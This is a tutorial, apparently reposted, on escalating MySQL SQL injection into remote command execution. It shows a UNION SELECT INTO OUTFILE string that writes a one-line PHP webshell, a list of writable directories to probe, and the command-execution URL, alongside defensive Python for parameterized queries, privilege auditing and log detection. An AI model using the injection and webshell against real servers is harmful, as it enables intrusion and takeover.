Backdoor Webserver using MySQL-SQL Injection
Source: Internet | Editor: 程序博客网 | Time: 2024/06/08 20:12
What is SQL Injection?
SQL injection is an attack that allows the attacker to add logical expressions and additional commands to the existing SQL query. This attack can succeed whenever a user has submitted data that is not properly validated and is glued together with a legitimate SQL query.
For example, the following SQL command is used to validate user login requests:
```php
// Vulnerable: user-supplied values are concatenated straight into the SQL string.
$sql_query = "select * from users where user='$user' and password='$pass'";
```
If the attacker submits `admin' or '1'='1` as the user name, the unvalidated input becomes part of the query, which now matches the admin row regardless of the password:
```php
$sql_query = "select * from users where user='admin' or '1'='1' and password='$pass'";
```
Using similar techniques, an attacker can retrieve database records, bypass login screens, and change database contents, for example by creating new administrative users. In this document, I will show how the same technique can be extended to execute arbitrary shell commands.
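As an added example (not code from the original article), here is the login check above written in Python twice: once with the same string concatenation, and once with a bound parameter. It uses the standard sqlite3 module as a stand-in for MySQL so that it runs offline; the MySQL DB-API drivers take parameters the same way (with `%s` placeholders instead of `?`). The account, password and table are constructed for the demo.

```python
import sqlite3

# Added example: the login check from the text, once vulnerable and once safe.
# sqlite3 stands in for MySQL so the demo runs offline; the sample account is constructed.

def make_db():
    """Build an in-memory users table with one constructed account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")
    return conn

def login_vulnerable(conn, user, password):
    """Mirror of $sql_query in the text: user input is glued into the SQL string."""
    sql = "select * from users where user='%s' and password='%s'" % (user, password)
    return conn.execute(sql).fetchone() is not None

def login_safe(conn, user, password):
    """Same check with placeholders: the driver sends the values separately from
    the statement, so quotes or SQL keywords in the input cannot change its structure."""
    sql = "select * from users where user=? and password=?"
    return conn.execute(sql, (user, password)).fetchone() is not None

PAYLOAD = "admin' or '1'='1"   # the injected user name from the text

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "admin", "s3cret"))   # True  (legitimate login)
    print(login_vulnerable(db, PAYLOAD, "wrong"))    # True  (login bypassed)
    print(login_safe(db, PAYLOAD, "wrong"))          # False (input treated as data)
```

The parameterized version is the fix: the same payload is compared as a literal user name and matches nothing.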
Command 1 - Writing arbitrary files
MySQL has a built-in statement that creates a file on the database server and writes the query result into it. It has the following format:
```sql
mysql> SELECT "text" INTO OUTFILE "file.txt";
```
Three things gate this statement: the database account needs the global FILE privilege; the server's secure_file_priv setting decides where (or whether) files may be written; and the file is created by the mysqld process, so the target directory must be writable by mysqld's operating-system user and the file must not already exist. From a security standpoint, the dangerous property of this statement is that it can be appended to an existing query using the UNION SQL token.
For example, it can be appended to the following query:
```sql
select user, password from user where user='admin' and password='123'
```
```sql
select user, password from user where user='admin' and password='123' union select "text",2 into outfile "/tmp/file.txt" -- '
```
As a result of the above command, /tmp/file.txt is created on the database server and contains the query result: the original rows followed by the injected row ("text", 2). The injected SELECT lists the same number of columns as the original (two), and the trailing "-- " comments out the quote that closed the original string literal.
Command 2 - Reading arbitrary files
MySQL also has a built-in function that reads a file from the database server and returns its contents. The syntax is very simple. We will use this function for plan B.
```sql
mysql> select load_file("PATH_TO_FILE");
```
It is subject to the same FILE privilege and secure_file_priv controls as INTO OUTFILE, and it returns NULL when the file does not exist or is not readable by the mysqld process.
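As an added example, not from the original article, the following Python audits the two server-side controls that gate both INTO OUTFILE and LOAD_FILE(): the FILE privilege on the database account and the secure_file_priv variable. It works on the text of SHOW GRANTS and SHOW VARIABLES output, so it needs no live server; the grant lines for the 'webapp' account and the secure_file_priv values are constructed.

```python
import re

# Added example: offline audit of the controls behind MySQL's file primitives.
# Inputs are the text of SHOW GRANTS / SHOW VARIABLES output (constructed below).

def has_file_privilege(grants):
    """Return True if any GRANT line gives FILE, or ALL PRIVILEGES, on *.*.
    FILE is a global privilege, so only the ON *.* grants matter."""
    for line in grants:
        m = re.match(r"GRANT\s+(.+?)\s+ON\s+\*\.\*", line, re.IGNORECASE)
        if not m:
            continue
        privs = [p.strip().upper() for p in m.group(1).split(",")]
        if "FILE" in privs or "ALL PRIVILEGES" in privs or "ALL" in privs:
            return True
    return False

def outfile_allowed(secure_file_priv):
    """Interpret secure_file_priv: NULL disables INTO OUTFILE / LOAD_FILE entirely,
    a directory confines them to that path, an empty value leaves them unrestricted."""
    if secure_file_priv is None or secure_file_priv.strip().upper() == "NULL":
        return "disabled"
    if secure_file_priv.strip() == "":
        return "unrestricted"
    return "confined to " + secure_file_priv.strip()

def assess(grants, secure_file_priv):
    """Combine both controls into a verdict for the account described by `grants`."""
    file_priv = has_file_privilege(grants)
    mode = outfile_allowed(secure_file_priv)
    if not file_priv or mode == "disabled":
        verdict = "blocked"      # the primitive is unavailable to this account
    elif mode == "unrestricted":
        verdict = "exposed"      # it can write anywhere mysqld's OS user can
    else:
        verdict = "confined"     # writes are limited to the secure_file_priv directory
    return {"file_privilege": file_priv, "outfile": mode, "verdict": verdict}

# Constructed sample: an over-privileged web application account ...
WEAK_GRANTS = [
    "GRANT ALL PRIVILEGES ON *.* TO 'webapp'@'localhost'",
]
# ... and the same account scoped to its own database, with no global privileges.
SAFE_GRANTS = [
    "GRANT USAGE ON *.* TO 'webapp'@'localhost'",
    "GRANT SELECT, INSERT, UPDATE, DELETE ON `shop`.* TO 'webapp'@'localhost'",
]

if __name__ == "__main__":
    print(assess(WEAK_GRANTS, ""))                         # verdict: exposed
    print(assess(SAFE_GRANTS, "/var/lib/mysql-files"))     # verdict: blocked
```

The "blocked" verdict is the target state for a web application account: it needs no FILE privilege at all, and secure_file_priv set to NULL or a dedicated directory removes the file-write primitive even if a query is injected.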
Webshell
A webshell is a popular and widely used tool for executing shell commands from within the web browser. Some call these tools PHP shells. We will create a very simple webshell that executes shell commands. Here is the code of a very basic PHP shell (the value passed in the cmd parameter is executed):
```php
<? system($_REQUEST['cmd']); ?>
```
For example, in the following screenshot, the id command is executed.
[Screenshot: Webshell - id command]
Attack Scenario
1. Find SQL injection
Finding the injection point is out of the scope of this document; you must first have a working SQL injection.
2. Find a directory with write permission
To create the webshell PHP script, we need a directory under the web root that is writable (MySQL creates the file, so it is the database server's process, not the web server, that needs write access there). Temporary directories used by popular Content Management Systems are a good choice for this. Check the following URLs to find one:
hxxp://www.target.com/templates_compiled/
hxxp://www.target.com/templates_c/
hxxp://www.target.com/templates/
hxxp://www.target.com/temporary/
hxxp://www.target.com/images/
hxxp://www.target.com/cache/
hxxp://www.target.com/temp/
hxxp://www.target.com/files/
In our example we will use a temp directory.
3. Exploit SQL injection - create web shell
You need to append the following string to the legitimate SQL command:
```sql
UNION SELECT "<? system($_REQUEST['cmd']); ?>",2,3,4 INTO OUTFILE "/var/www/html/temp/c.php" --
```
Some explanation:
2,3,4 are placeholders used to match the number of columns in the first part of the SELECT query.
/var/www/html is the default web directory in RedHat-like distributions (Fedora, CentOS).
temp is a directory with full write access. In your case it could be a different directory.
The above command writes the query's result to c.php with the "<? system($_REQUEST['cmd']); ?>" string appended. Because the file name has a .php extension, the web server hands the file to the PHP interpreter, so this string will allow us to execute shell commands!
4. Execute shell commands
Now comes the easiest part. Simply request the new file from the web server to execute shell commands. In our example it will be:
hxxp://www.target.com/temp/c.php?cmd=SHELL_COMMAND
For example:
hxxp://www.target.com/temp/c.php?cmd=id
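As an added example for the defender's side (not part of the original article), the Python below runs detection logic over web server access log lines for the two observable stages of the scenario: the injected request carrying a UNION SELECT ... INTO OUTFILE, and the later request to a .php file inside a content directory with a cmd parameter. The log lines, the client addresses, and the /temp/ directory and c.php name are constructed from the placeholders in the text.

```python
import re
from urllib.parse import unquote_plus

# Added example: detection over access log lines for the two stages of the
# scenario in the text. The log lines are constructed; /temp/ and c.php are the
# placeholders used in the article, not values from any real site.

# Stage 1: an injected query that uses UNION and MySQL's file primitives.
UNION_RE = re.compile(r"\bUNION\b(\s+ALL)?\s+SELECT\b", re.I)
FILE_RE = re.compile(r"\bINTO\s+(OUTFILE|DUMPFILE)\b|\bLOAD_FILE\s*\(", re.I)

# Stage 2: a PHP file requested from a directory that should only hold
# uploads, caches or images, with a parameter named like a command.
CONTENT_DIRS = ("temp", "temporary", "templates_c", "templates_compiled",
                "templates", "cache", "images", "files")
WEBSHELL_RE = re.compile(r"^/(%s)/[^/?]+\.php\?.*\bcmd=" % "|".join(CONTENT_DIRS), re.I)

# Common/Combined log format: client ident user [time] "METHOD target proto" status ...
LOG_RE = re.compile(r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
                    r'"(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def classify(line):
    """Return the list of tags for one access log line ([] if nothing matched)."""
    m = LOG_RE.match(line)
    if not m:
        return []
    # Decode %XX and '+' first so that URL-encoded keywords are still seen.
    target = unquote_plus(m.group("target"))
    tags = []
    if UNION_RE.search(target):
        tags.append("sqli-union")
    if FILE_RE.search(target):
        tags.append("sqli-file-primitive")
    if WEBSHELL_RE.match(target):
        tags.append("webshell-request")
    return tags

def scan(lines):
    """Return (line_number, tags, decoded_target) for every suspicious line."""
    findings = []
    for number, line in enumerate(lines, 1):
        tags = classify(line)
        if tags:
            target = unquote_plus(LOG_RE.match(line).group("target"))
            findings.append((number, tags, target))
    return findings

# Constructed sample log: one benign request, the injection, the webshell call,
# a static file, and a UNION probe without any file primitive.
SAMPLE_LOG = [
    '10.0.0.5 - - [08/Jun/2024:20:12:01 +0000] "GET /index.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [08/Jun/2024:20:12:07 +0000] "GET /login.php?user=admin%27%20UNION%20SELECT%201%2C2%2C3%2C4'
    '%20INTO%20OUTFILE%20%22%2Fvar%2Fwww%2Fhtml%2Ftemp%2Fc.php%22%20--%20&pass=x HTTP/1.1" 200 1034',
    '10.0.0.9 - - [08/Jun/2024:20:12:15 +0000] "GET /temp/c.php?cmd=id HTTP/1.1" 200 88',
    '10.0.0.7 - - [08/Jun/2024:20:12:20 +0000] "GET /images/logo.png HTTP/1.1" 200 4021',
    '10.0.0.9 - - [08/Jun/2024:20:13:02 +0000] "GET /search.php?q=1%20UNION%20ALL%20SELECT%201%2C2 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, tags, target in scan(SAMPLE_LOG):
        print(number, tags, target)
```

Decoding the target before matching matters: the injection in the sample arrives fully percent-encoded, and a rule that searches the raw line for "INTO OUTFILE" would miss it. The webshell rule is deliberately narrow to the content directories listed in step 2; a broader rule would flag any .php file created in a directory that the deployment never writes code into.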